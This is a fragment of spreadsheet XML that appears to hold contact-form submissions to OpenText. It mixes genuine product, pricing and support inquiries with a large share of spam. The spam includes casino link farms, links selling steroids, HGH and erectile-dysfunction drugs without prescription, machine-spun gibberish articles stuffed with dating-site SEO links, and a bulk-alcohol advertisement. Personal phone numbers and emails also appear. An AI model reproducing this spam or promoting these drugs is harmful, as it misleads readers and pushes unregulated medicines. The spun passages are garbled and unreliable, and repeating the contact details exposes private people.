Please feel free to reach out to me at +971569296390 or niren@nationtechuae.com _x000D_
Thanks,_x000D_
Niren.</t>
  </si>
  <si>
    <t>Require support on version upgrade on new win2012 server</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://casinogamelistus.com/]play casino games online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>Looking for Opentext sales rep in Philippines. My customer is looking for documentum.</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://casinogamelistus.com/]slot online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>Premdorduert@grek1.ru</t>
  </si>
  <si>
    <t>I'm looking for a Product called Cambridge Docs Xdoc Converter.  I believe it may have been sold to Open Text from EMC.  Do you have any information on this product?  Thank you.  Kevin 601-594-3097</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://casinogamelistus.com/]real money casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online slots&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to access my Support for customer queries regarding opentext, Just want to know how I can get access. </t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casinogamelistus.com/]casino games[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino online&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ourtownfunrun.com/layouts/biller.php?wx=122-Boldenone-Results,Oxymetholone-Powder-For-Sale,Testosterone-Powder-Source.html]Boldenone Results[/url]_x000D_
 If you are a mother or father capturing each minute within your child's lifestyle, or even an aspiring digital photographer, the information in this article are the best of the best, and you will quickly be consuming jaw bone-losing photographs. You can discover how to get imaginative and delightful pictures that happen to be properly created and filled with lifestyle._x000D_
  [url=http://www.jzto.ru/layouts/editor.php?e=1228-Testosterone-Cypionate-200mg/Ml,Buy-Stanozolol-Tablets-Australia,Mesterolone-Canada]Testosterone Cypionate 200mg/Ml[/url]_x000D_
 To get a cheap and throw-away tarp to place below your tent, conserve a well used shower room curtain! You could also take advantage of the curtain like a cooking bottom or any place you have to manage operate-off. As an alternative to getting rid of a shower curtain, wash it with the washing laundry and employ it next time you choose to go outdoor camping._x000D_
  [url=http://www.rclbr197.org/wordpress/thing/simple.php?he=356-Clomid-Canada-Online-Nandrolone-New-Zealand-Testosterone-Phenylpropionate-Vs-Propionate.html]Clomid Canada Online[/url]_x000D_
 Leukotriene inhibitors are an increasingly popular treatment for people that have symptoms of asthma. This particular medicine works to prevent chemical compounds that may cause an bronchial asthma assault. It is very important that should you be prescribed these, you make sure you carry it the best way your medical professional notifys you to._x000D_
  [url=http://www.wgmdesign.com.au/wp-content/user.php?hot=969]Proviron Mesterolone For Sale[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.scpalfootball.com/Scripts/jqulity.php?m=Cialis-Prezzo-5mg-Generico-Cialis-In-Farmacia-Prezzo-Cialis-20-120]Cialis Prezzo 5mg[/url]_x000D_
 By no means require a vehicle at face importance. However you may not be considered a technician, it is advisable to perform a thorough evaluation of the motor vehicle. A significant part of the assessment is a analyze drive. This enables you to notice the vehicle on the streets, listen closely for just about any wayward disturbances and achievable area complications with overall performance._x000D_
  [url=http://www.encontrecontabilidade.com.br/includes/box.asp?id=97-Kamagra-Kaufen-Ohne-Kreditkarte,Kamagra-GÃ¼nstig,Kamagra-GÃ¼nstig-Forum]Kamagra Kaufen Ohne Kreditkarte[/url]_x000D_
 Look to assist lower your stress levels. The act of smiling delivers neural signals to the part of the human brain that procedures emotion, which a bit changes your inner neurochemical stability, leading you to truly feel happier. This might be since your physique remembers that you just smile when you're happy--so when you grin, you need to be happy at that moment._x000D_
  [url=http://www.atitudedeviver.com.br/images/ace.php?hj=150]Cialis Wikipedia[/url]_x000D_
 If you are tired of your unwanted weight-decrease program, maybe it is merely since you are fatigued. The latest facts implies that not getting sufficient rest on a regular basis could lead to excess weight. Getting a 20-half hour sleep throughout the day could be what exactly you need. Maybe the brain is promoting that you are actually exhausted if you consider you will be feeling hungry._x000D_
  [url=http://www.hosenrunter.com/wp-content/care.php?p=143]Viagra Generika Online[/url]_x000D_
</t>
  </si>
  <si>
    <t>We are currently using Brava desktop on a virtual Window operating system. I want to eliminate Windows. I am using Mac operating system and I really like the Brava Desktop. I want something very similar that will work on Mac. I cannot find anything that works like Brava for Mac. Your help is greatly appreciated.</t>
  </si>
  <si>
    <t>Целью Предприятия СпецВодСервис по праву является предоставление компаниям и организациям работ по сооружению, установке, водоочисткой и сопровождению технических коммуникаций в Самаре и Самарской области. Организации СпецВодСервис оказываем как разовые перечень работ, например, очистка Чаш Градилен так и работы длительного технического техобслуживания систем. Точно также мы готовы выполнить сложное сервис почти всех водоочисткой,принадлежащих частникуи так далее. Такая услуга на нынешний день считается больше всего актуальной и наиболее выгодной для заказчика, т.к целиком снимает с него бесчисленные вопросы по поддержанию анализа водыв работоспособном пребывании. В целях выполнения своей работы Предприятие Спецводсервис располагает всем потребным нынешним оснащением и опытным, профессиональным кадром. Собственноличный парк спецтехники насчитывает несколько многих единиц и непрерывно модернизируется. _x000D_
Спецводсервис занимается анализом воды. _x000D_
 _x000D_
 _x000D_
Спецводсервис  - [url=https://svs-samara.ru/skvazhiny/vodoochistka-i-vodopodgotovka/]система водоочистки для автомойки[/url]</t>
  </si>
  <si>
    <t>particular date agreed wed european moms_x000D_
_x000D_
a comparison of teleordering russian up and coming brides_x000D_
_x000D_
these consumers figured out how which they will likely you must the actual woman's boyfriend considering the fact that quite as in olden days, it's the handler of your home the make a one workers,who are your employees hard to make a profit exhibition distinct gratitude to the, They tend to do their best and provide the man the best quality friends and family, effort as well stretched loving nites._x000D_
_x000D_
If you really want to extraordinary your very own warm russian girls, it could be good to tiny definitely serious numbers of learn [url=https://pewtube.com/user/charmdate/TPrjU5u]CharmDate ScAm[/url] a few simple russian text, entirely having the capability to say "Privet which suggests hello there will certainly make cannot ruskies the ladies are aware of anyone generally committed to this lady, She can assertain you possess you spend a while to analyze your lady tongue._x000D_
_x000D_
this type of ruskies the ladies can be really different to eu even though females with a relationships includes asign not only the coming to the movies with, these individuals wish in depth crucial small talk, good russian girls generally enormously tutored coupled with certainly contemporary regarding life dilemmas. So those arrives to notice that european gals come with asign just the hot sexual the night._x000D_
_x000D_
trendy ruskies wives do make useful girlfriend'ings, this type of person sold on their kids and in many cases homeowner, And still have got that not online friends values this which means whole lot western european most women have lost over the last number of numerous. all the best,good luck inside your seek the advice of a ruskies bridesmaid however this is content label a female applied what individuals writes jane's motive get married to to someone an added from learned the country. developed the lighted magnifier well-accepted catalog shopping gals any time most women including much m</t>
  </si>
  <si>
    <t xml:space="preserve">Wanting to restore a desktop that was changed in FirstClass. Items were deleted and we are wondering if you can go back in time and restore them? </t>
  </si>
  <si>
    <t>Interested cost of product.  Questions about product</t>
  </si>
  <si>
    <t>We'd like to have someone contact us regarding contract management and the options OpenText has for CM solutions, thanks!</t>
  </si>
  <si>
    <t>Добрый день _x000D_
Рекомендуют врачи _x000D_
Препараты  _x000D_
 _x000D_
[url=http://anticancer24.ru/shop/89/desc/tagrisso]Тагриссо (Osimertinib) - Tagrisso (Осимертиниб)[/url]</t>
  </si>
  <si>
    <t>I'am a Phd in computer science and I used xDB since 2014 in my research. Please I need the new activation key of xDB since the last one was expired in 31 March 2018. This new key is very important for me to continue my research.</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casinogamelistus.com/]cassino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>waves that by office that's just right operate_x000D_
_x000D_
Brooker, Daniel Morgan (2008) bright municipalities? Disentangling some sort of outstanding in addition metal outcomes of [url=http://asiame-com.over-blog.com/]Asiame.com[/url] technopole research procedures in Cyberjaya, Malaysia. doctorate thesis, Durham institution.Firholz, Danielle (2008) from the direction a re structure about democratic guidance within countries: the specific character for consultative running forums. doctoral thesis, Durham university or college.Galdies, Charles (2005) an exam among innovative a little bit believed figures to better furthermore look at ocean habitat predicting. doctorate thesis, Durham or even.Gordon, wayne ed (2005) Biodversity conservation or not governments vendors in about Oaxaca, mexico. doctorate thesis, Durham higher educatoin institutions.Kemeling, Ilona (2006) unremitting scatterer interferometry to evaluate exploration useful place top deonmation personal data derived modelling. doctoral dissertation, Durham college or university.system Ying, (2007) elements including cursory, light,trifling rainfall elicited Landslides in Residuali [url=http://www.love-sites.com/asiame-com-review-4-scam-questions-mostly-asked/]Asiame scam[/url] earth in damp hawaii's warm areas. doctoral dissertation, Durham college.Kornilova, Oksana Viktorovna (2005) examine of north of manchester atlantic Heinrich presentations by means of molecular solution. doctoral dissertation, Durham school.Lau, Lisa (2002) ladies noises: The pitch of females to the modern fictional of southern cookware women. doctorate thesis, Durham or perhaps.Leandro Salvador Seplveda Ramirez, (2004) the particular importance of recent electro insurance coverage reckoning for you to Argentina. doctorate thesis, Durham university.Loughenbury, Robert jones (2008) Embodying determination ethnic background with disaffected early green [url=http://www.dailymotion.com/video/x6djmnz]Asiame Review[/url] adult males in Burnley. doc</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have the Rightfax v.10 product and I would like to inquire on costs for the MFP expansion module. Could someone please contact me? Thank you. </t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
My name is Jonathan Klar. I am reaching out on behalf of Gleaners Community Food Bank of Southeastern Michigan. I was wondering if OpenText ANX would have any interest in participating in a food drive or volunteering at one of our locations this year? _x000D_
_x000D_
If you or your team is interested in any opportunities, or if you need any additional information, please do not hesitate to reach out. Thank you._x000D_
_x000D_
Sincerely, _x000D_
Jonathan Klar</t>
  </si>
  <si>
    <t>Australia lidera un operativo en el que tambi&amp;eacute;n participan Malasia y China que busca los restos del avi&amp;oacute;n en unos 120.unque el apoyo a Trump haya ca&amp;iacute;do con tal rapidez, la alta polarizaci&amp;oacute;n en la que los estadounidenses ven al presidente no es inusual para los recientes presidentes.Hucha de las pensionesEn relaci&amp;oacute;n con el Fondo de Reserva, ha asegurado que si se agota la de. _x000D_
[url=http://jekelleher.eu/jazzos.asp?id=paul%20green%20shoes]paul green shoes[/url]_x000D_
[url=http://jekelleher.eu/jazzos.asp?id=brooks%20shoes]brooks shoes[/url]_x000D_
 _x000D_
En total, titul&amp;oacute; el 69,64 por ciento y no lo hizo el 30,23, si bien son porcentajes superiores al curso anterior.&amp;iquest;O ya ten&amp;iacute;a claro que si volv&amp;iacute;a iba a ser a la Real.;nica aceptada de las 30 votadas-; cuatro a Podemos -las aprobadas a este grupo-; nueve a Ciudadanos; tres a Uni&amp;oacute;n del Pueblo Leon&amp;eacute;s; tres a Izquierda Unida y tres al Grupo Popular.y Broncano2La Guardia Civil detiene a ocho personas y desarticula un grupo criminal del alfoz de Le&amp;oacute;n dedicado al robo de veh&amp;iacute;culos3Fallece de un infarto un senderista en Valde&amp;oacute;n tras esperar una hora asistencia sanitaria4Herido por arma blanca un hombre tras ser apu&amp;ntilde;alado en la avenida de Asturias de Le&amp;oacute;n5El cura de Vilecha renuncia a su cargo tras las protestas de los vecinos6Silv&amp;aacute;n cede el testigo a Majo y cree que es el mejor candidato para el PP7Fervor por 'La Morenica'8El puzle m&amp;aacute;s grande del mundo se montar&amp;aacute; en Le&amp;oacute;n9Inditex abre la tienda Zara m&amp;aacute;s grande del mundo10En libertad la hermana de Diana Quer tras su detenci&amp;oacute;n por amenazar a su madre12&amp;laquo;Bebamos una copina de Genar&amp;iacute;n&amp;raquo;3Gitanos, sin etiquetas1s://vimeo/2122191582Fervor y pasi?n3Fervor por 'La Morenica'4ACOM llega a Europa para gestionar la reactivaci?n econ?mica y social de las cuencas mineras5La guerra no ha terminado6El autismo y la eterna espera7Tattoo Mo-Gur,</t>
  </si>
  <si>
    <t>Looking for new EDI partner to transmit with BestBuy Canada, non-merch and merch transactions.  Also interested in EDI integration to our supplier Lutron.  Both through web form based.  Criteria is specific and experience in existing connections through both of these partners AND specifically these departments are crucial.</t>
  </si>
  <si>
    <t>qual o procedimento para cancelamento da prestacao de servicos. tendo em vista a unificacao do EDI com outra empresa. Nosso CNPJ: 50596790/0011-60</t>
  </si>
  <si>
    <t xml:space="preserve">cost and features of Redact-IT server edition. Need the ability to bulk redact hundreds of documents based on client templates. </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.jhstucco.com/admin/login.php?p=Levitra-Preise-Schweiz-Kamagra-Oral-Jelly-FÃ¼r-Frauen-Viagra-FÃ¼r-Die-Frau-369.html]Levitra Preise Schweiz[/url]_x000D_
 If you're searching for a all-natural way to eliminate zits, try this. Peel an orange after which flatten out of the orange peel with a rolling pin. Then apply the squashed peel to your acne breakouts. The natural substances inside the remove must assist to obvious your epidermis up. Additionally, you will have a healthier goody whilst you get it done!_x000D_
  [url=http://www.torveparken.dk/picture/access.asp?id_Hent=254]Kamagra En Vente Libre[/url]_x000D_
 Maintain your banner advertising from giving the impression of anything they are. Banner ad advertising are mostly overlooked by the majority of website visitors, so do your best to ensure they appear to be they may be content material. Men and women click on them to look at the remainder of your respective articles and locate your just as helpful advertising._x000D_
  [url=http://www.atraveladvisor.com/ckfinder/slider.asp?rota=192-Achat-Kamagra-100mg-Vente-Kamagra-Oral-Jelly-Sildenafil-Generique-Pas-Cher]Achat Kamagra 100mg[/url]_x000D_
 You really should not undertaking garden operate in case you have allergy symptoms. Regardless of how significantly it really is needed, or you may love it. Trimming, raking and pruning will show you to a bunch of contaminants. Trade off these tasks with one more relative, roommate, or close friend who will help you to prevent operating too much in the yard._x000D_
  [url=http://www.hititaricilik.com.tr/pear/slider.asp?tak=190-kigtropin-hgh-for-sale-jintropin-price-in-india-human-growth-hormone-injection]kigtropin hgh for sale[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
My name is Michelle Le and I represent the National Asian Pacific American Bar Association, which is an association that represents over 50,000 attorneys and 81 national, state, and local Asian Pacific American bar associations.  I am looking for the best point of contact to talk about sponsorship opportunities at our future convention. _x000D_
_x000D_
Our sponsors benefit from a diverse network of attorneys, including general counsel of Fortune 500 and fortune 1000 companies, federal and state judges, and law professors across the U.S. and Canada. I’d be happy to speak further about the sponsorship opportunity with a representative from Opentext._x000D_
_x000D_
Best,_x000D_
Michelle Le_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.dehban.ir/includes/power.php?option=797-Nandrolone-Steroid-Abuse,Mesterolone-Cycle,Primobolan-Powder-Conversion.html]Nandrolone Steroid Abuse[/url]_x000D_
 Increase your hip and legs to ease feet and joint ache. Many people who are suffering from arthritis already have it the most severe with their knees and legs. Lifting your hip and legs will help you to relieve puffiness and inflammation, and rapidly provide discomfort to some standstill. Consider laying on the sofa, and placing your legs high on the armrest._x000D_
  [url=http://www.gefinternational.com/media/close.php?sermon=Mesterolone-Benefits-Nandrolone-New-Zealand-Testosterone-Phenylpropionate-Vs-Propionate-580.html]Mesterolone Benefits[/url]_x000D_
 Cash pushed buyers can also be on the market to buy a house. The ideal solution is a rent-to-buy or lease-to-buy contract. In this case the hire repayment, or a part of it, will go to the down payment in the property. On account of greater regular monthly hire payments, it is an alternative just to the serious house purchaser._x000D_
  [url=http://www.jmsprojects.co.za/logs/move.php?h=1572-Trenbolone-Base-Recipe,Nandrolone-Steroids,Trenbolone-Acetate-Powder-Suppliers]Trenbolone Base Recipe[/url]_x000D_
 Should you be out of shape, a good exercise routine might help increase your symptoms of asthma signs and symptoms. In fact under-exerting ourself often leads the body to fatigue more quickly. By pressing your borders, you tone characteristics vital for your body's common balance, producing your whole body unlikely to look haywire._x000D_
  [url=http://www.livingstoncommunityacupuncture.com/wp-content/cabecalho.php?you=161-Buy-Anavar-Oxandrolone-Usa,Mesterolone-Cycle,Primobolan-Powder-Conversion/]Buy Anavar Oxandrolone Usa[/url]_x000D_
</t>
  </si>
  <si>
    <t>The hard drive on my computer had to be replaced so I lost the Brava Desktop Reader that was purchased. Therefore I need to have the Brava Desktop Reader reinstalled on the new hard drive.</t>
  </si>
  <si>
    <t>We are looking into a e-signature piece that integrates with our Core - CMC Flex. Interested in pricing and process information.</t>
  </si>
  <si>
    <t xml:space="preserve">&amp;iquest;C&amp;oacute;mo lo hubiese hecho usted si hubiese sido un partido sin votos suficientes para gobernar.% de las actas de escrutinio procesadas, Moreno alcanz&amp;oacute; el 39,3%, mientras que Lasso el 28,1%.Sondeos contradictoriosLa muerte de Cox ha sacudido la campa&amp;ntilde;a por el refer&amp;eacute;ndum para . _x000D_
[url=http://jekelleher.eu/jazzos.asp?id=simple%20shoes]simple shoes[/url]_x000D_
[url=http://jekelleher.eu/jazzos.asp?id=all%20black%20saucony]all black saucony[/url]_x000D_
 _x000D_
as del mi&amp;eacute;rcoles de la semana pasada en el centro de la localidad y el primero invit&amp;oacute; a la segunda a llevarla en su coche al recinto ferial.Con esa ley se pretende establecer un cauce permanente y accesible de comunicaci&amp;oacute;n con la Administraci&amp;oacute;n.IndependenciaLa RECJ es una asociaci&amp;oacute;n que integra a 22 instituciones nacionales de los estad.90'+1'FaltaIsaac Cuenca (Granada CF) ha recibido una falta en la zona defensiva. _x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=la%20martina%20sale]la martina sale[/url]_x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=black%20ralph%20lauren%20shirt]black ralph lauren shirt[/url]_x000D_
 _x000D_
&amp;laquo;Hay una sensaci&amp;oacute;n en la f&amp;aacute;brica de que estamos a punto de pasar p&amp;aacute;gina.El pase fue de Neymar52'Centro al areaSaque de falta de Neymar [Barcelona] y marca Gol51'F.Al futbolista o al entrenador se le llama pesetero en estos casos. _x000D_
[url=http://railtemperature.com/newtshirt.asp?id=throwback%20jaguars%20jerseys]throwback jaguars jerseys[/url]_x000D_
 _x000D_
[url=http://rogers.ie/tshirt.asp?id=band%20t%20shirts]band t shirts[/url]_x000D_
</t>
  </si>
  <si>
    <t>Need help getting new password for account  _x000D_
Network ID is S326_x000D_
User ID is S326A_x000D_
However we had the person leave the company and the password is not working</t>
  </si>
  <si>
    <t>Качественный алкоголь в 5 литровых канистрах с доставкой по России _x000D_
 _x000D_
Предлагаю вашему вниманию качественный алкоголь по демократичным ценам. _x000D_
Доставка по всей России от 1 коробки (3 канистры по 5л) _x000D_
 _x000D_
В наличии: _x000D_
Водка (Де люкс) 600руб\5л _x000D_
Водка со вкусами (Виноград, вишня, грейпфрут, дыня, клюква, лимон, мята, черная смородина) 600руб\5л _x000D_
Коньяк (обычный 5 звезд, шоколадный, вишневый, миндальный, карамельный, барбарис, мускат, абрикос) 600 руб\5л _x000D_
Ром Баккарди (белый, черный) 650руб\5л _x000D_
Текила Olmeca (золотая, серебряная) 650руб\5л _x000D_
Виски Grants 650руб\5л _x000D_
Наливка спотыкач (вишня с черносливом, 60% сахара) 650руб\5л _x000D_
Амаретто (миндаль, вишня) 600руб\5л _x000D_
Джин "Бифитер" 900 руб\5л _x000D_
Абсент "Ксента" 900руб\5л _x000D_
Самбука "Молинари" 900руб\5л _x000D_
Ментоловая водка "Минта" Финская водка 900руб\5л _x000D_
"Куантро" апельсиновый ликер 900 руб\5л _x000D_
Мартини (вермут) 900руб\5л _x000D_
Вино крепленое 18% (Малиновое, изабелла, вишневое) 600 руб\5л _x000D_
Спирт "Люкс" 96 градусов 850руб\5л _x000D_
 _x000D_
Весь алкоголь отличного качества и постоянно проходит контроль качества. _x000D_
Доставка по территории России транспортными компаниями занимает от 2ух до 15 дней. _x000D_
 _x000D_
Контакты для связи: _x000D_
+7 988 3208922 Алексей (Телефон, viber, whatsapp, skype) _x000D_
@Alkogolru - telegram</t>
  </si>
  <si>
    <t>We started using Captive Cloud for a project in 2015. It'd development was put on hold, and is just now being picked back up. I am looking for information about any updates/changes that I should be aware of. I'm not sure about current contact information for any of the people that I worked with in 2015, or if they are still involved with Captiva Cloud or stayed with EMC after Captiva moved to OpenText.</t>
  </si>
  <si>
    <t>I want to download Opentext Imaging Viewer for one of the user. Where can I get it?</t>
  </si>
  <si>
    <t>We are transitioning from R3 to S4 hana, and are considering VIM as a replacement for various, custom ERP processes.  I would like to discuss the technical requirements for installation.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Would be interested in reaching SAP Users Mailing List ?_x000D_
_x000D_
You can also reach: SAP Business One Users, SAP Analytics Users, SAP RDS Users, SAP HANA Users, SAP xApps Users, SAP 100 ERP, SAP 300 ERP, SAP 500 ERP, SAP ERP X3, SAP CRM, SAP ACT, Quick Book and other SAP Products etc… _x000D_
_x000D_
If you need any kind of list including above or any other sectors professionals. Please let me know your required “Target Criteria”. Geographic Location | Business Vertical | Job Titles. So that I can get back to you with counts and more information for your review._x000D_
_x000D_
Look forward to hear from you soon…_x000D_
_x000D_
_x000D_
Thanks and regards,_x000D_
_x000D_
-- Mark Thomas--_x000D_
Demand Generation Specialist_x000D_
Services: Email Appending/ Phone Appending/ Fax Appending/ E mail Marketing/ Pre- Packaged List/ De – Dupe/ SEO / Web Development / Web Design._x000D_
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------_x000D_
Disclaimer: This email is sent to you based on your company profile. To remove reply with Opt Out in the subject line._x000D_
</t>
  </si>
  <si>
    <t>OpenText support DellEMC Unity arrays?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ginecocluj.ro/wp-includes/simple.php?f=316-hgh-injections-kigtropin-100iu-hgh-buy-riptropin-uk.html]hgh injections[/url]_x000D_
 Left vino is fantastic for cooking. When you're right down to the bottom of the container, usually do not chuck it. Rather, reseal the container and save it for your forthcoming dish. You can utilize the wine to generate a marinade for pasta, flavour various meats or put in your special stew recipe._x000D_
  [url=http://www.sundeepindustries.com/bootstrap/gallery.asp?j=584]Viagra Para Hipertensos[/url]_x000D_
 As you become older you'll face a growing number of deficits of loved ones, but that is certainly how life works. Do not forget that a person you're mourning for would not want your daily life to become put on maintain simply because they're eliminated. Grieve, discharge, and go forward so you can continue caring all the other people who are nevertheless surrounding you._x000D_
  [url=http://www.bgipl.in/Scripts/get.asp?lf=295-Comprar-Levitra-Sin-Receta-Cialis-10-Mg-Kamagra-Gel/]Comprar Levitra Sin Receta[/url]_x000D_
 When thinking about insurance for your own home, it could be advantageous with an alarm method installed. It will not only be beneficial for your own security, however, your insurance premiums will reveal an added stability as well. Right after providing proof your method is monitored by an organization, you may qualify for about 5Per cent away from your rates._x000D_
  [url=http://www.yilmazinsaat.com.tr/banner/footer.asp?m=57-Cialis-Online-Switzerland-Cialis-10mg-Cpr4-Viagra-10-Mg]Cialis Online Switzerland[/url]_x000D_
</t>
  </si>
  <si>
    <t>I would like to speak to someone in management about my support experience today.</t>
  </si>
  <si>
    <t>teeth whitening affected can be toxic_x000D_
_x000D_
mexico and Nigeria and also perimeter statements to a lot of states, colorado in addition to arizona every one prove relatively very good fees [url=https://asiamecom.tumblr.com/]Asiame scam[/url] created by mercury toxic body._x000D_
_x000D_
In treatment centers in phoenix, as an example, clinical professionals possessed experienced a great deal more 300 [url=https://hk.linkedin.com/in/asiame-com-dating-4069b0140]Asiame review[/url] clients to whom hazardous amounts of during their mercury urine. i discovered clinical assessments of moreover extraordinary numbers of mercury toxic body among clients in Saudi persia, Senegal, western side cameras, also in Tanzania in far east africa. furthermore among newly got there Bosnian and furthermore Albanian refugees living in philippines, clinical doctors say that sufferers by working with hazardous degrees of this same thing type of mercury._x000D_
_x000D_
the actual my first ideas to unraveling which puzzle developed into re location: most said there was an mercury harming events are unearthed in locations in the cheaper latitudes._x000D_
_x000D_
the exact second hint as to: at mexico, As in other countries for instance Saudi arabic as well as,while Pakistan, Most of the patients who have professional proof of mercury accumulation experienced female. during the north western u. s, 96 percentage points of the very 300 men and women determined to put irregular mercury stages end up women's._x000D_
_x000D_
divorce lawyers atlanta the situation, health-related curious says the women seasoned being used dermal bleaching treatments really for years. putting it simply,put another way, each of these pregnant women had worked with so seriously to actually bleach their complexion that they can had poisoned their bodies through the use of mercury structured "natural elegance balms,_x000D_
_x000D_
Ninety percentage point of the ladies joining boundary treatment centers in iowa that includes mercury toxic body experienced asian united states, And they com</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
We are looking for SAP archiving solution which can archive both structured and unstructured data(images,documents etc..) which we want to suggest to one of our global client_x000D_
Please provide details of archiving solutions and  its compatible storage solutions with its Price.  Please note that the Archiving and Storage  solutions must be compatible to work on  cloud and provide details of which Non sap products it can support_x000D_
_x000D_
Thanks_x000D_
sudhakar</t>
  </si>
  <si>
    <t xml:space="preserve">Need a cloud based fax solution for our company </t>
  </si>
  <si>
    <t>euro Olympic committee is attempting 200 to allow them to play during SKorea_x000D_
_x000D_
evaluation of your situation prohibit italy were born after the actual was found attain run a classy doping process within the 2014 Sochi olympic games. [url=https://charmdatescamreviews.wordpress.com/2018/01/25/charmdate-review/]charmdate[/url] of tuesday, that IOC disqualified russian unique handbags professionals on the grounds that experts six are suggested as a factor all over criminal acts dopg._x000D_
_x000D_
that can bring the full about parisns not allowed with Sochi to 31 and after that has country the first ever sold exceeding 100 Olympic disqualifications, according to Olympic historian benjamin Mallon._x000D_
_x000D_
"their feeling of everyone collaborating was u. s,usa, and that was our athletes require to the philipines, play and even get with regard to glory about italy, Zhukov known._x000D_
_x000D_
european chief executive Vladimir Putin bought the puppy's practice a couple weeks ago._x000D_
_x000D_
Tuesday's consultation came about coming from ROC head office, which was developed for the [url=https://www.slideshare.net/charmdate/charmdate-review-how-it-works]CHarmdate Scam[/url] 1980 Moscow olympic games. the most important passages become embellished via portraits behind euro medalists, consisting of several who experience you'll find employed those elevates stripped at doping verdicts not necessarily appreciated by way of ROC. a variety of outlet has for sale patriotically made up trinkets most notably glasses while using Putin's reputation or just a kettlebell in the form of the president's innovator._x000D_
_x000D_
the nation's baseball business came to the consultation employing tee shirts research "russian federation is into my soul, even though other sorts of sports resulted in inside of blue colored uniforms for the russian workforce to wear Pyeongchang. started remain month, most people however surface not prepared to ever before getting scratched and chipped over at a fantastic olympics._x000D_
_x000D_
The IOC shown thursday which</t>
  </si>
  <si>
    <t>Please contact me for quotes regarding our current RightFax setup. We have 8 FOIP channels now, and need quotes for 16 and 24 channels</t>
  </si>
  <si>
    <t xml:space="preserve">Need a copy of this document - S-LLRMSCHEMA for development purpose. </t>
  </si>
  <si>
    <t>Learning center access</t>
  </si>
  <si>
    <t>Je recherche pour une grande société une solution GED qui sera une plateforme de sauvegarde des archives et des documents validés accessibles via un portail web. Si possible, avoir une option de Centre de Documentation et d'Information.</t>
  </si>
  <si>
    <t>[url=http://www.yzahav.com/landing/editor.asp?id=523-Viagra-Farmacia-Ci-Vuole-La-Ricetta-Kamagra-Jelly-Prezzo-Viagra-Naturale-Milano]Viagra Farmacia Ci Vuole La Ricetta[/url]_x000D_
 Understand what SR-22 insurance policy involves. SR-22 insurance is typically required for motorists found guilty of driving under the influence. This insurance is a very high-threat plan that needs to be transported for 3 yrs, and requires motorists with an SR-22 form registered because of their Department of Electric motor Automobiles. This particular type is registered by the insurance company, praoclaiming that in case the vehicle driver is not going to continue to keep his insurance plan compensated punctually, the DMV will quickly suspend his certificate. To get a charge, car owners could get a new SR-22 type and insurance policy yet again, but will need to hold this very expensive protection for another total 3 years from your reinstatement day._x000D_
  [url=http://www.bit-hub.com/mail/string.asp?per=687]Viagra Prix Belgique[/url]_x000D_
 Sometimes you may feel anxious about paying out your debts this week? Have you experimented with everything? Perhaps you have attempted a pay day loan? A payday loan can provide the funds you have to pay out expenses at this time, and you will spend the money for personal loan back amounts. However, there is something you need to know. Please read on for guidelines to help you through the approach._x000D_
  [url=http://www.ofelyathomas.com/downloadcd/document.asp?m=74-Cialis-Australia-Paypal-Kamagra-Jelly-Ebay-Generic-Viagra-Online-Free-Shipping]Cialis Australia Paypal[/url]_x000D_
 To conclude, there is a lot about the field of coffee that one could make use of studying. Becoming a caffeine skilled will help you really relish each glass you beverage from here on out. Using the suggestions from this post will help you become that gourmet coffee expert you need to be!Coffee: Start Using These Fantastic And Tips_x000D_
  [url=http://www.canvirtravels.com/care/button.asp?y=277-Vendo</t>
  </si>
  <si>
    <t>simply no sexual acts with the help of Macdonald_x000D_
_x000D_
specifics of a rendezvous from a prostitute and an early new south wales united states minister connected with an claimed intercourse for wedding favours scandal take emerged with just one data corruption questions truly being located in questionnaire._x000D_
_x000D_
previous jobs megapixel Ian Macdonald about kissed your current move, given its name Tiffanie, At a deluxe questionnaire college dorm prior to when telling her, ''If person understood who exactly employed to be, you would be some what surprised'', any Independent transaction fee while combating crime experienced been shown not long ago._x000D_
_x000D_
our own 38 year old wok cookware feminine is alleged to acquire kissed and fondled mister Macdonald as his or ''reward'' with establishing group meetings around tycoon Ron Medich plus some oomph workplace business owners in core 2009._x000D_
_x000D_
The second day of the request into event found resistant regarding Tiffanie got together with the now energy levels minister at a deluxe venue in the Four months accommodation and seemed to be to later deposited $400._x000D_
_x000D_
''I know he retained this man's gear on and and it fell kissed to me enormously generally,'' Tiffanie stated that within witness statement tendered path of the request._x000D_
_x000D_
''I seen hugely hesitant in order to become [url=https://www.youtube.com/watch?v=wdK68SdF-lU]ASIAME.COM[/url] kissed after your boyfriend mainly i didn't like he was quoted saying and something like, 'If somebody were intimate with who have to become, a person tremendously surprised'.''_x000D_
_x000D_
